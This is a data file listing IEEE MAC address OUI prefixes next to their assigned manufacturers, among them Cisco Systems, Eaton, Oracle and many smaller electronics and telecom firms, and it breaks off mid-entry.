000CF2 GAMESA Eólica 000D2E Matsushita Avionics Systems Corporation 000D28 Cisco Systems, Inc 000D4D Ninelanes 000D53 Beijing 5w Communication Corp. 000CFC S2io Technologies Corp 000D38 NISSIN INC. 000D15 Voipac s.r.o. 000CA1 SIGMACOM Co., LTD. 000CA6 Mintera Corporation 000CC1 Eaton Corporation 000C8B Connect Tech Inc 000C90 Octasic Inc. 000C8C KODICOM CO.,LTD. 000CC2 ControlNet (India) Private Limited 000C94 United Electronic Industries, Inc. (EUI) 000C9B EE Solutions, Inc 000CE1 The Open Group 000CDC BECS Technology, Inc 000CC5 Nextlink Co., Ltd. 000CDE ABB STOTZ-KONTAKT GmbH 000CBF Holy Stone Ent. Co., Ltd. 000C4D Curtiss-Wright Controls Avionics & Electronics 000C44 Automated Interfaces, Inc. 000C3B Orion Electric Co., Ltd. 000C71 Wybron, Inc 000C72 Tempearl Industrial Co., Ltd. 000C78 In-Tech Electronics Limited 000C59 Indyme Electronics, Inc. 000C5C GTN Systems B.V. 000C55 Microlink Communications Inc. 000C52 Roll Systems Inc. 000C74 RIVERTEC CORPORATION 000C67 OYO ELECTRIC CO.,LTD 000C2E Openet information technology(shenzhen) Co., Ltd. 000C2C Enwiser Inc. 000C28 RIFATRON 000C3D Glsystech Co., Ltd. 000C2F SeorimTechnology Co.,Ltd. 000C31 Cisco Systems, Inc 000C53 Private 000C48 QoStek Corporation 000C63 Zenith Electronics Corporation 000BBB Etin Systems Co., Ltd 000BBC En Garde Systems, Inc. 000BB1 Super Star Technology Co., Ltd. 000BBF Cisco Systems, Inc 000BAD PC-PoS Inc. 000BA0 T&L Information Inc. 000C17 AJA Video Systems Inc 000C11 NIPPON DEMPA CO.,LTD. 000C14 Diagnostic Instruments, Inc. 000BB5 nStor Technologies, Inc. 000BB9 Imsys AB 000C21 Faculty of Science and Technology, Keio University 000C1B ORACOM Co, Ltd. 000BC9 Electroline Equipment 000BC2 Corinex Communication Corp. 000BF7 NIDEK CO.,LTD 000C00 BEB Industrie-Elektronik AG 000BF3 BAE SYSTEMS 000BED ELM Inc. 000B91 Aglaia Gesellschaft für Bildverarbeitung und Kommunikation mbH 000B97 Matsushita Electric Industrial Co.,Ltd. 000B92 Ascom Danmark A/S 000B9A Shanghai Ulink Telecom Equipment Co. Ltd. 000B9D TwinMOS Technologies Inc. 000B96 Innotrac Diagnostics Oy 000B56 Cybernetics 000B50 Oxygnet 000B52 JOYMAX ELECTRONICS CO. LTD. 000B69 Franke Finland Oy 000BA5 Quasar Cipta Mandiri, PT 000B49 RF-Link System Inc. 000B46 Cisco Systems, Inc 000B7A L-3 Linkabit 000B84 BODET 000B77 Cogent Systems, Inc. 000B66 Teralink Communications 000B2C Eiki Industrial Co. Ltd. 000B26 Wetek Corporation 000B28 Quatech Inc. 000B2A HOWTEL Co., Ltd. 000B30 Beijing Gongye Science & Technology Co.,Ltd 000AF2 NeoAxiom Corp. 000AF5 Airgo Networks, Inc. 000AF0 SHIN-OH ELECTRONICS CO., LTD. R&D 000AF4 Cisco Systems, Inc 000AEE GCD Hard- & Software GmbH 000AD8 IPCserv Technology Corp. 000AD7 Origin ELECTRIC CO.,LTD. 000B38 Knürr GmbH 000B32 VORMETRIC, INC. 000B07 Voxpath Networks 000B04 Volktek Corporation 000AF9 HiConnect, Inc. 000B1F I CON Computer Co. 000B13 ZETRON INC 000B10 11wave Technonlogy Co.,Ltd 000AE9 AirVast Technology Inc. 000B2B HOSTNET CORPORATION 000B02 Dallmeier electronic 000ACD Sunrich Technology Limited 000ACC Winnow Networks, Inc. 000ACF PROVIDEO Multimedia Co. Ltd. 000AD1 MWS 000A7D Valo, Inc. 000A7F Teradon Industries, Inc 000A81 TEIMA Audiotex S.L. 000A87 Integrated Micromachines Inc. 000A77 Bluewire Technologies LLC 000A8C Guardware Systems Ltd. 000A96 MEWTEL TECHNOLOGY INC. 000A82 TATSUTA SYSTEM ELECTRONICS CO.,LTD. 000AD3 INITECH Co., Ltd 000AC8 ZPSYS CO.,LTD. (Planning&Management) 000AC6 Overture Networks. 000AAB Toyota Technical Development Corporation 000AB4 ETIC Telecommunications 000A7A Kyoritsu Electric Co., Ltd. 000A9C Server Technology, Inc. 000A75 Caterpillar, Inc 000A12 Azylex Technology, Inc 000A13 Honeywell Video Systems 000A09 TaraCom Integrated Products, Inc. 000A41 Cisco Systems, Inc 000A36 Synelec Telecom Multimedia 000A48 Albatron Technology 000A3E EADS Telecom 000A59 HW server 000A54 Laguna Hills, Inc. 000A4F Brain Boxes Limited 000A52 AsiaRF Ltd. 000A02 ANNSO CO., LTD. 000A65 GentechMedia.co.,ltd. 000A22 Amperion Inc 000A1C Bridge Information Co., Ltd. 000A32 Xsido Corporation 000A2B Etherstuff 000A42 Cisco Systems, Inc 000A38 Apani Networks 0009A8 Eastmode Pte Ltd 0009AA Data Comm for Business, Inc. 0009A4 HARTEC Corporation 0009A6 Ignis Optics, Inc. 0009A7 Bang & Olufsen A/S 0009C8 SINAGAWA TSUSHIN KEISOU SERVICE 0009B7 Cisco Systems, Inc 0009B2 L&F Inc. 0009F3 WELL Communication Corp. 0009EF Vocera Communications 0009C4 Medicore Co., Ltd 0009D9 Neoscale Systems, Inc 0009D0 Solacom Technologies Inc. 0009CC Moog GmbH 000A00 Mediatek Corp. 0009F0 Shimizu Technology Inc. 0009E4 K Tech Infosystem Inc. 000972 Securebase,Inc 000978 AIJI System Co., Ltd. 000973 Lenten Technology Co., Ltd. 000975 fSONA Communications Corporation 000977 Brunner Elektronik AG 000969 Meret Optical Communications 000942 Wireless Technologies, Inc 000945 Palmmicro Communications Inc 00093E C&I Technologies 000940 AGFEO GmbH & Co. KG 00097F Vsecure 2000 LTD. 000980 Power Zenith Inc. 0009A0 Microtechno Corporation 00099B Western Telematic Inc. 000990 ACKSYS Communications & systems 000953 Linkage System Integration Co.Ltd. 00094C Communication Weaver Co.,Ltd. 00096E GIANT ELECTRONICS LTD. 00096C Imedia Semiconductor Corp. 00095F Telebyte, Inc. 00098A EqualLogic Inc 0008F9 Artesyn Embedded Technologies 0008F4 Bluetake Technology Co., Ltd. 0008F7 Hitachi Ltd, Semiconductor & Integrated Circuits Gr 000920 EpoX COMPUTER CO.,LTD. 000922 TST Biometrics GmbH 000916 Listman Home Technologies, Inc. 000911 Cisco Systems, Inc 000912 Cisco Systems, Inc 000908 VTech Technology Corp. 00090B MTLInstruments PLC 00093B HYUNDAI NETWORKS INC. 000934 Dream-Multimedia-Tv GmbH 000931 Future Internet, Inc. 0008F5 YESTECHNOLOGY Co.,Ltd. 0008EC Optical Zonu Corporation 0008E6 Littlefeet 000930 AeroConcierge Inc. 00091E Firstech Technology Corp. 0008E2 Cisco Systems, Inc 000905 iTEC Technologies Ltd. 0008A5 Peninsula Systems Inc. 0008A2 ADI Engineering, Inc. 000898 Gigabit Optics Corporation 00089B ICP Electronics Inc. 00089C Elecs Industry Co., Ltd. 00089D UHD-Elektronik 0008CF Nippon Koei Power Systems Co., Ltd. 0008CB Zeta Broadband Inc. 0008D3 Hercules Technologies S.A.S. 0008D0 Musashi Engineering Co., LTD. 0008BA Erskine Systems Ltd 0008B5 TAI GUEN ENTERPRISE CO., LTD 0008B7 HIT Incorporated 0008A9 SangSang Technology, Inc. 0008C8 Soneticom, Inc. 0008C4 Hikari Co.,Ltd. 00088F ADVANCED DIGITAL TECHNOLOGY 00088B Tropic Networks Inc. 00086B MIPSYS 00087F SPAUN electronic GmbH & Co. KG 000886 Hansung Teliann, Inc. 000858 Novatechnology Inc. 000850 Arizona Instrument Corp. 00085B Hanbit Electronics Co., Ltd. 00082B Wooksung Electronics, Inc. 00082E Multitone Electronics PLC 0007ED Altera Corporation 0007F1 TeraBurst Networks Inc. 0007F2 IOA Corporation 0007EA Massana, Inc. 0007F0 LogiSync LLC 0007E7 FreeWave Technologies 0007D6 Commil Ltd. 0007D7 Caporis Networks AG 0007D4 Zhejiang Yutong Network Communication Co Ltd. 0007CE Cabletime Limited 0007D3 SPGPrints B.V. 000813 Diskbank, Inc. 00080F Proximion Fiber Optics AB 000812 GM-2 Corporation 00080B Birka BPA Informationssystem AB 00080A Espera-Werke GmbH 0007E3 Navcom Technology, Inc. 0007E1 WIS Communications Co. Ltd. 0007E0 Palm Inc. 0007FA ITT Co., Ltd. 0007F6 Qqest Software Systems 0007FB Giga Stream UMTS Technologies GmbH 00085D Mitel Corporation 000855 NASA-Goddard Space Flight Center 00085A IntiGate Inc. 000817 EmergeCore Networks LLC 000815 CATS Co., Ltd. 000818 Pixelworks, Inc. 00082A Powerwallz Network Security 0007AC Eolring 0007AA Quantum Data Inc. 0007A4 GN Netcom Ltd. 00079D Musashi Co., Ltd. 00079F Action Digital Inc. 00047C Skidata AG 0007BE DataLogic SpA 0007AF Red Lion Controls, LP 000767 Yuxing Electronics Company Limited 00075B Gibson Guitars 000762 Group Sense Limited 000784 Cisco Systems, Inc 000776 Federal APD 00077A Infoware System Co., Ltd. 000790 Tri-M Technologies (s) Limited 00078D NetEngines Ltd. 00078A Mentor Data System Inc. 000792 Sütron Electronic GmbH 0007B2 Transaccess S.A. 0007AD Pentacon GmbH Foto-und Feinwerktechnik 0007D0 Automat Engenharia de Automação Ltda. 00076A NEXTEYE Co., Ltd. 0006E6 DongYang Telecom Co., Ltd. 0006DC Syabas Technology (Amquest) 00070C SVA-Intrusion.com Co. Ltd. 00070F Fujant, Inc. 000714 Brightcom 0006F3 AcceLight Networks 0006D2 Tundra Semiconductor Corp. 0006D8 Maple Optical Systems 0006CF Thales Avionics In-Flight Systems, LLC 0006FE Ambrado, Inc 0006E7 Bit Blitz Communications Inc. 0006ED Inara Networks 0006DB ICHIPS Co., Ltd. 000727 Zi Corporation (HK) Ltd. 00072E North Node AB 000699 Vida Design Co. 00068D SEPATON, Inc. 0006A3 Bitran Corporation 00069F Kuokoa Networks 0006A2 Microtune, Inc. 0006A6 Artistic Licence Engineering Ltd 0006B8 Bandspeed Pty Ltd 0006BB ATI Technologies Inc. 0006BD BNTECHNOLOGY Co., Ltd. 0006C3 Schindler Elevator Ltd. 0006AA VT Miltope 000657 Market Central, Inc. 000697 R & D Center 00069A e & Tel 00067D Takasago Ltd. 000671 Softing AG 000672 Netezza 00066A InfiniCon Systems, Inc. 000661 NIA Home Technologies Corp. 0006B2 Linxtek Co. 0006B6 Nir-Or Israel Ltd. 000684 Biacore AB 000682 Convedia 0005E3 LightSand Communications, Inc. 0005ED Technikum Joanneum GmbH 0005EF ADOIR Digital Technology 000600 Toshiba Teli Corporation 00066B Sysmex Corporation 00055A Power Dsine Ltd. 000653 Cisco Systems, Inc 00064F PRO-NETS Technology Corporation 000612 Accusys, Inc. 000609 Crossport Systems 000616 Tel Net Co., Ltd. 00060D Wave7 Optics 00064A Honeywell Co., Ltd. (KOREA) 00063F Everex Communications Inc. 00063D Microwave Data Systems Inc. 000639 Newtec 00062F Pivotech Systems Inc. 000636 Jedai Broadband Networks 000651 Aspen Networks Inc. 00065C Malachite Technologies, Inc. 000642 Genetel Systems Inc. 0005E9 Unicess Network, Inc. 0005E6 Egenera, Inc. 00061E Maxan Systems 000622 Chung Fu Chen Yeh Enterprise Corp. 000588 Sensoria Corp. 00058D Lynx Photonic Networks, Inc. 00058A Netcom Co., Ltd. 000591 Active Silicon Ltd 000593 Grammar Engine Inc. 0005C7 I/F-COM A/S 0005CC Sumtel Communications, Inc. 0005CF Thunder River Technologies, Inc. 0005C6 Triz Communications 0005D6 L-3 Linkabit 0005DA Apex Automationstechnik 0005A1 Zenocom 0005A9 Princeton Networks, Inc. 0005AF InnoScan Computing A/S 0005A6 Extron Electronics 0005A0 MOBILINE Kft. 000584 AbsoluteValue Systems, Inc. 00058F CLCsoft co. 0005BB Myspace AB 000517 Shellcomm, Inc. 00051C Xnet Technology Corp. 0004F9 Xtera Communications, Inc. 0004FA NBS Technologies Inc. 000541 Advanced Systems Co., Ltd. 000545 Internet Photonics 00053A Willowglen Services Pte Ltd 000531 Cisco Systems, Inc 000539 A Brand New World in Sweden AB 00052A Ikegami Tsushinki Co., Ltd. 00052D Zoltrix International Limited 000525 Puretek Industrial Co., Ltd. 000558 Synchronous, Inc. 000550 Vcomms Connect Limited 000512 Zebra Technologies Inc 000503 ICONAG 00057A Overture Networks 000564 Tsinghua Bitway Co., Ltd. 0004F8 QUALICABLE TV Industria E Com., Ltda 0004F5 SnowShore Networks, Inc. 0004F2 Polycom 0004F3 FS FORTH-SYSTEME GmbH 0004ED Billion Electric Co., Ltd. 0004E7 Lightpointe Communications, Inc 0004E6 Banyan Network Private Limited 0004DE Cisco Systems, Inc 0004A2 L.S.I. Japan Co., Ltd. 00049B Cisco Systems, Inc 000499 Chino Corporation 00048E Ohm Tech Labs, Inc. 0004A6 SAF Tehnika Ltd. 0004A8 Broadmax Technologies, Inc. 0004A1 Pathway Connectivity 0004CE Patria Ailon 0004C7 NetMount 00048DTeo Technologies, Inc 000490 Optical Access 0004E1 Infinior Microsystems 0004C2 Magnipix, Inc. 000486 ITTC, University of Kansas 00048B Poscon Corporation 000484 Amann GmbH 000478 G. Star Technology Corporation 00047A AXXESSIT ASA 00046A Navini Networks 00046B Palm Wireless, Inc. 000472 Telelynx, Inc. 000464 Pulse-Link Inc 000465 i.s.t isdn-support technik GmbH 00045E PolyTrax Information Technology AG 000411 Inkra Networks, Inc. 000410 Spinnaker Networks, Inc. 000412 WaveSmith Networks, Inc. 000442 NACT 000445 LMS Skalar Instruments GmbH 00044E Cisco Systems, Inc 000452 RocketLogix, Inc. 000427 Cisco Systems, Inc 000420 Slim Devices, Inc. 00043D INDEL AG 00043B Lava Computer Mfg., Inc. 000431 GlobalStreams, Inc. 0003C4 Tomra Systems ASA 0003C5 Mobotix AG 0003BF Centerpoint Broadband Technologies, Inc. 0003B9 Hualong Telecom Co., Ltd. 0003F9 Pleiades Communications, Inc. 0003FE Cisco Systems, Inc 0003F5 Chip2Chip 000391 Advanced Digital Broadcast, Ltd. 0003AC Fronius Schweissmaschinen 000399 Dongju Informations & Communications Co., Ltd. 0003FD Cisco Systems, Inc 0003BA Oracle Corporation 0003AF Paragea Communications 00030B Hunter Technology, Inc. 0003C9 TECOM Co., Ltd. 0003C1 Packet Dynamics Ltd 0003DE OTC Wireless 000328 Mace Group, Inc. 00032B GAI Datenfunksysteme GmbH 00032C ABB Switzerland Ltd 000323 Cornet Technology, Inc. 000380 SSH Communications Security Corp. 000382 A-One Co., Ltd. 00037A Taiyo Yuden Co., Ltd. 000375 NetMedia, Inc. 00035A Photron Limited 000353 Mitac, Inc. 000356 Wincor Nixdorf International GmbH 00034F Sur-Gard Security 00037B IDEC IZUMI Corporation 000367 Jasmine Networks, Inc. 00036A Mainnet, Ltd. 00036B Cisco Systems, Inc 00036C Cisco Systems, Inc 00038F Weinschel Corporation 000384 AETA 000387 Blaze Network Products 000381 Ingenico International 000340 Floware Wireless Systems, Ltd. 0001EC Ericsson Group 000333 Digitel Co., Ltd. 000338 Oak Technology 000339 Eurologic Systems, Ltd. 000331 Cisco Systems, Inc 000330 Imagenics, Co., Ltd. 00034A RIAS Corporation 0002CF ZyGate Communications, Inc. 0002D1 Vivotek, Inc. 0002C2 Net Vision Telecom 0002B6 Acrosser Technology Co., Ltd. 0002B1 Anritsu, Ltd. 0002AD HOYA Corporation 0002AE Scannex Electronics Ltd. 000304 Pacific Broadband Communications 000301 EXFO 0002FD Cisco Systems, Inc 000300 Barracuda Networks, Inc. 0002BD Bionet Co., Ltd. 0002BE Totsu Engineering, Inc. 0002B9 Cisco Systems, Inc 0002BA Cisco Systems, Inc 0002F9 MIMOS Berhad 0002F3 Media Serve Co., Ltd. 0002EA Focus Enhancements 000313 Access Media SPA 000310 E-Globaledge Corporation 00030A Argus Technologies 00031E Optranet, Inc. 000315 Cidco Incorporated 000319 Infineon AG 0002E7 CAB GmbH & Co KG 0002DF Net Com Systems, Inc. 0002DB NETSEC 00024B Cisco Systems, Inc 00024D Mannesman Dematic Colby Pty. Ltd. 000250 Geyser Networks, Inc. 000248 Pilz GmbH & Co. 00024C SiByte, Inc. 00025A Catena Networks 00026E NeGeN Access, Inc. 000270 Crewave Co., Ltd. 00023B Ericsson 000239 Visicom 000233 Mantra Communications, Inc. 0002A2 Hilscher GmbH 000254 WorldGate 00029A Storage Apps 00028F Globetek, Inc. 000287 Adapcom 000281 Madge Ltd. 000263 UPS Manufacturing SRL 000240 Seedek Co., Ltd. 0001F3 QPS, Inc. 0001E4 Sitera, Inc. 0001E3 Siemens AG 0001EB C-COM Corporation 0001F2 Mark of the Unicorn, Inc. 0001D9 Sigma, Inc. 0001C5 Simpler Networks 0001C9 Cisco Systems, Inc 00021B Kollmorgen-Servotronix 00021E SIMTEL S.R.L. 000221 DSP Application, Ltd. 0001F7 Image Display Systems, Inc. 000200 Net & Sys Co., Ltd. 0001C4 NeoWave, Inc. 0001C1 Vitesse Semiconductor Corporation 0001D8 Teltronics, Inc. 000205 Hitachi Denshi, Ltd. 000215 Cotas Computer Technology A/B 00022A Asound Electronic 00018C Mega Vision 00018F Kenetec, Inc. 00017B Heidelberger Druckmaschinen AG 00019C JDS Uniphase Inc. 0001A3 GENESYS LOGIC, INC. 000182 DICA TECHNOLOGIES AG 000189 Refraction Technology, Inc. 000193 Hanbyul Telecom Co., Ltd. 0030F5 Wild Lab. Ltd. 00015D Oracle Corporation 000173 AMCC 00016C FOXCONN 000175 Radiant Communications Corp. 0001AF Artesyn Embedded Technologies 00018A ROI COMPUTER AG 000192 Texas Digital Systems 00015C CADANT INC. 000169 Celestix Networks Pte Ltd. 00016B LightChip, Inc. 0001B6 SAEJIN T&M Co., Ltd. 0001AB Main Street Networks 000145 WINSYSTEMS, INC. 000137 IT Farm Corporation 00013C TIW SYSTEMS 000133 KYOWA Electronic Instruments C 0001A5 Nextcomm, Inc. 000190 SMK-M 00014C Berkeley Process Control 000143 Cisco Systems, Inc 00014B Ennovate Networks, Inc. 00013D RiscStation Ltd. 000120 OSCILLOQUARTZ S.A. 003046 Controlled Electronic Manageme 003098 Global Converging Technologies 00300D MMC Technology, Inc. 003075 ADTECH 00B069 Honewell Oy 00B0C2 Cisco Systems, Inc 00B03B HiQ Networks 000127 OPEN Networks Pty Ltd 00010E Bri-Link Technologies Co., Ltd 003037 Packard Bell Nec Services 003057 QTelNet, Inc. 0030FC Terawave Communications, Inc. 00B086 LocSoft Limited 0030A2 Lightner Engineering 003042 DeTeWe-Deutsche Telephonwerke 00B0C7 Tellabs Operations, Inc. 00B02A ORSYS GmbH 000104 DVICO Co., Ltd. 000106 Tews Datentechnik GmbH 000109 Nagano Japan Radio Co., Ltd. 00029C 3COM 00B019 UTC CCS 00306F SEYEON TECH. CO., LTD. 00303D IVA CORPORATION 0030F4 STARDOT TECHNOLOGIES 003052 ELASTIC NETWORKS 003019 Cisco Systems, Inc 003076 Akamba Corporation 0030EC BORGARDT 0030F3 At Work Computers 0030CC Tenor Networks, Inc. 0030B0 Convergenet Technologies 0030EB TURBONET COMMUNICATIONS, INC. 0030A1 WEBGATE Inc. 00306A PENTA MEDIA CO., LTD. 003086 Transistor Devices, Inc. 003044 CradlePoint, Inc 0030C2 COMONE 003053 Basler AG 0030D2 WIN TECHNOLOGIES, CO., LTD. 003059 KONTRON COMPACT COMPUTERS AG 003097 AB Regin 00305F Hasselblad 0030DC RIGHTECH CORPORATION 003025 CHECKOUT COMPUTER SYSTEMS, LTD 003012 DIGITAL ENGINEERING LTD. 0030C6 CONTROL SOLUTIONS, INC. 0030D6 MSC VERTRIEBS GMBH 003041 SAEJIN T & M CO., LTD. 00308C Quantum Corporation 0030E3 SEDONA NETWORKS CORP. 0030BF MULTIDATA GMBH 00D00F SPEECH DESIGN GMBH 003058 API MOTION 003034 SET ENGINEERING 00304A Fraunhofer IPMS 00308D Pinnacle Systems, Inc. 0030A6 VIANET TECHNOLOGIES, LTD. 00D0BF PIVOTAL TECHNOLOGIES 00303C ONNTO CORP. 003024 Cisco Systems, Inc 0030F6 SECURELOGIX CORPORATION 00D02F VLSI TECHNOLOGY INC. 0030D8 SITEK 003016 ISHIDA CO., LTD. 00D0B1 OMEGA ELECTRONICS SA 00D016 SCM MICROSYSTEMS, INC. 00D043 ZONAL RETAIL DATA SYSTEMS 00D0C1 HARMONIC DATA SYSTEMS, LTD. 00D0AC Commscope, Inc 00D07C KOYO ELECTRONICS INC. CO.,LTD. 00D0BC Cisco Systems, Inc 00D0CB DASAN CO., LTD. 00D019 DAINIPPON SCREEN CORPORATE 00D035 BEHAVIOR TECH. COMPUTER CORP. 00D0DB MCQUAY INTERNATIONAL 00D070 LONG WELL ELECTRONICS CORP. 00D029 WAKEFERN FOOD CORPORATION 00D0C3 VIVID TECHNOLOGY PTE, LTD. 00D013 PRIMEX AEROSPACE COMPANY 00D0A3 VOCAL DATA, INC. 00D07E KEYCORP LTD. 00D020 AIM SYSTEM, INC. 00D0C8 Prevas A/S 005017 RSR S.R.L. 005065 TDK-Lambda Corporation 0050B9 XITRON TECHNOLOGIES, INC. 00506B SPX-ATEG 00D076 Bank of America 00D051 O2 MICRO, INC. 00D0BB Cisco Systems, Inc 00D06E TRENDVIEW RECORDERS LTD. 00D05C KATHREIN TechnoTrend GmbH 00D0EA NEXTONE COMMUNICATIONS, INC. 00D064 MULTITEL 00D05E STRATABEAM TECHNOLOGY, INC. 00D0AA CHASE COMMUNICATIONS 00D05D INTELLIWORXX, INC. 00D0A1 OSKAR VIERLING GMBH + CO. KG 00D006 Cisco Systems, Inc 00D02A Voxent Systems Ltd. 00D08F ARDENT TECHNOLOGIES, INC. 00D0FA Thales e-Security Ltd. 00D0EB LIGHTERA NETWORKS, INC. 0050A1 CARLO GAVAZZI, INC. 00D0C0 Cisco Systems, Inc 00D068 IWILL CORPORATION 005029 1394 PRINTER WORKING GROUP 005081 MURATA MACHINERY, LTD. 0050AC MAPLE COMPUTER CORPORATION 005049 Arbor Networks Inc 00500D SATORI ELECTORIC CO., LTD. 0050A3 TransMedia Communications, Inc. 0050A4 IO TECH, INC. 00505C TUNDO CORPORATION 0050B3 VOICEBOARD CORPORATION 00508C RSI SYSTEMS 0050E1 NS TECH ELECTRONICS SDN BHD 0050DE SIGNUM SYSTEMS CORP. 005075 KESTREL SOLUTIONS 0050ED ANDA NETWORKS 005096 SALIX TECHNOLOGIES, INC. 005012 CBL - GMBH 0050F2 MICROSOFT CORP. 00504A ELTECO A.S. 0050C1 GEMFLEX NETWORKS, LTD. 0050CF VANLINK COMMUNICATION TECHNOLOGY RESEARCH INSTITUTE 005024 NAVIC SYSTEMS, INC. 0090BD OMNIA COMMUNICATIONS, INC. 0090B4 WILLOWBROOK TECHNOLOGIES 009003 APLIO 009031 MYSTICOM, LTD. 00909D NovaTech Process Solutions, LLC 0090DD MIHARU COMMUNICATIONS Inc 009028 NIPPON SIGNAL CO., LTD. 00907D Lake Communications 0090C9 DPAC Technologies 00507B MERLOT COMMUNICATIONS 0050CD DIGIANSWER A/S 00502D ACCEL, INC. 00503A DATONG ELECTRONICS LTD. 005087 TERASAKI ELECTRIC CO., LTD. 005026 COSYSTEMS, INC. 00902C DATA & CONTROL EQUIPMENT LTD. 00901D PEC (NZ) LTD. 009097 Sycamore Networks 009025 BAE Systems Australia (Electronic Systems) Pty Ltd 00904C Epigram, Inc. 009084 ATECH SYSTEM 00906A TURNSTONE SYSTEMS, INC. 009087 ITIS 009051 ULTIMATE TECHNOLOGY CORP. 009026 ADVANCED SWITCHING COMMUNICATIONS, INC. 0090D3 GIESECKE & DEVRIENT GmbH 009067 WalkAbout Computers, Inc. 00902A COMMUNICATION DEVICES, INC. 00900D Overland Storage Inc. 0090CF NORTEL 009072 SIMRAD AS 00902F NETCORE SYSTEMS, INC. 009098 SBC DESIGNS, INC. 009045 Marconi Communications 009036 ens, inc. 00908B Tattile SRL 009044 ASSURED DIGITAL, INC. 009091 DigitalScape, Inc. 00907E VETRONIX CORP. 009050 Teleste Corporation 00904D SPEC S.A. 0090FD CopperCom, Inc. 009039 SHASTA NETWORKS 0090FC NETWORK COMPUTING DEVICES 009014 ROTORK INSTRUMENTS, LTD. 00908D VICKERS ELECTRONICS SYSTEMS 009042 ECCS, Inc. 009033 INNOVAPHONE AG 009002 ALLGON AB 0010D4 STORAGE COMPUTER CORPORATION 000629 IBM Corp 0010A9 ADHOC TECHNOLOGIES 00108A TeraLogic, Inc. 001024 NAGOYA ELECTRIC WORKS CO., LTD 0010D6 Exelis 001048 HTRC AUTOMATION, INC. 001097 WinNet Metropolitan Communications Systems, Inc. 001085 POLARIS COMMUNICATIONS, INC. 00100C ITO CO., LTD. 001006 Thales Contact Solutions Ltd. 009009 I Controls, Inc. 00908E Nortel Networks Broadband Access 00907C DIGITALCAST, INC. 0090D2 ARTEL VIDEO SYSTEMS 0001FE DIGITAL EQUIPMENT CORPORATION 0090BE IBC/INTEGRATED BUSINESS COMPUTERS 00103C IC ENSEMBLE, INC. 001019 SIRONA DENTAL SYSTEMS GmbH & Co. KG 0090DE CARDKEY SYSTEMS, INC. 00906B APPLIED RESOURCES, INC. 0010E2 ArrayComm, Inc. 0010D2 NITTO TSUSHINKI CO., LTD 0010D9 IBM JAPAN, FUJISAWA MT+D 009066 Troika Networks, Inc. 001094 Performance Analysis Broadband, Spirent plc 001050 RION CO., LTD. 00109C M-SYSTEM CO., LTD. 0010CE VOLAMP, LTD. 0010B2 COACTIVE AESTHETICS 00105F ZODIAC DATA SYSTEMS 00103E NETSCHOOLS CORPORATION 0010CB FACIT K.K. 0010E0 Oracle Corporation 00107C P-COM, INC. 0010BD THE TELECOMMUNICATION TECHNOLOGY COMMITTEE (TTC) 001008 VIENNA SYSTEMS CORPORATION 0010D1 Top Layer Networks, Inc. 00106A DIGITAL MICROWAVE CORPORATION 00106F TRENTON TECHNOLOGY INC. 001034 GNP Computers 001044 InnoLabs Corporation 0010A1 KENDIN SEMICONDUCTOR, INC. 0010A8 RELIANCE COMPUTER CORP. 00106E TADIRAN COM. LTD. 00109A NETLINE 001089 WebSonic 0010E6 APPLIED INTELLIGENT SYSTEMS, INC. 00103B HIPPI NETWORKING FORUM 00E083 JATO TECHNOLOGIES, INC. 00E072 LYNK 00E0AD EES TECHNOLOGY, LTD. 00E094 OSAI SRL 00E032 MISYS FINANCIAL SYSTEMS, LTD. 00E0C0 SEIWA ELECTRIC MFG. CO., LTD. 00E0D1 TELSIS LIMITED 00E0F0 ABLER TECHNOLOGY, INC. 00E002 CROSSROADS SYSTEMS, INC. 00E0D6 COMPUTER & COMMUNICATION RESEARCH LAB. 00E074 TIERNAN COMMUNICATIONS, INC. 00E0D9 TAZMO CO., LTD. 00E055 INGENIERIA ELECTRONICA COMERCIAL INELCOM S.A. 00E0B4 TECHNO SCOPE CO., LTD. 00E071 EPIS MICROCOMPUTER 00E066 ProMax Systems, Inc. 00E093 ACKFIN NETWORKS 00E042 Pacom Systems Ltd. 00E0EB DIGICOM SYSTEMS, INCORPORATED 00E01C Cradlepoint, Inc 00E027 DUX, INC. 00E04B JUMP INDUSTRIELLE COMPUTERTECHNIK GmbH 00E097 CARRIER ACCESS CORPORATION 00E089 ION Networks, Inc. 00E070 DH TECHNOLOGY 00E05C PHC Corporation 00E024 GADZOOX NETWORKS 00605B IntraServer Technology, Inc. 0060D7 ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE (EPFL) 00E0BA BERGHOF AUTOMATIONSTECHNIK GmbH 00E021 FREEGATE CORP. 00E05B WEST END SYSTEMS CORP. 00E044 LSICS CORPORATION 00E0CA BEST DATA PRODUCTS 00E0A7 IPC INFORMATION SYSTEMS, INC. 00E062 HOST ENGINEERING 00E0CE ARN 00E05F e-Net, Inc. 00E01F AVIDIA Systems, Inc. 00E0D0 NETSPEED, INC. 00E060 SHERWOOD 00E06A KAPSCH AG 00E001 STRAND LIGHTING LIMITED 00E0D8 LANBit Computer, Inc. 00E0E7 RAYTHEON E-SYSTEMS, INC. 00E03C AdvanSys 00E073 NATIONAL AMUSEMENT NETWORK, INC. 006066 LACROIX Trafic 0060F4 ADVANCED COMPUTER SOLUTIONS, Inc. 006060 Data Innovations North America 006035 DALLAS SEMICONDUCTOR, INC. 006007 ACRES GAMING, INC. 006058 COPPER MOUNTAIN COMMUNICATIONS, INC. 0060FB PACKETEER, INC. 0060C1 WaveSpan Corporation 00603C HAGIWARA SYS-COM CO., LTD. 00607D SENTIENT NETWORKS INC. 006019 Roche Diagnostics 006059 TECHNICAL COMMUNICATIONS CORP. 006003 TERAOKA WEIGH SYSTEM PTE, LTD. 00607A DVS GMBH 0060F3 Performance Analysis Broadband, Spirent plc 00607C WaveAccess, Ltd. 0060A0 SWITCHED NETWORK TECHNOLOGIES, INC. 006017 TOKIMEC INC. 006026 VIKING Modular Solutions 00606E DAVICOM SEMICONDUCTOR, INC. 0060C7 AMATI COMMUNICATIONS CORP. 1000E8 NATIONAL SEMICONDUCTOR 006073 REDCREEK COMMUNICATIONS, INC. 0060FD NetICs, Inc. 0060CB HITACHI ZOSEN CORPORATION 0060C8 KUKA WELDING SYSTEMS & ROBOTS 006023 PERICOM SEMICONDUCTOR CORP. 006063 PSION DACOM PLC. 006031 HRK SYSTEMS 00600E WAVENET INTERNATIONAL, INC. 0060A3 CONTINUUM TECHNOLOGY CORP. 00603D 3CX 0060ED RICARDO TEST AUTOMATION LTD. 006012 POWER COMPUTING CORPORATION 00604D MMC NETWORKS, INC. 0060F7 DATAFUSION SYSTEMS 006020 PIVOTAL NETWORKING, INC. 0060C0 Nera Networks AS 006077 PRISA NETWORKS 006094 IBM Corp 0060AB LARSCOM INCORPORATED 0060DD MYRICOM, INC. 006046 VMETRO, INC. 006068 Dialogic Corporation 00605A CELCORE, 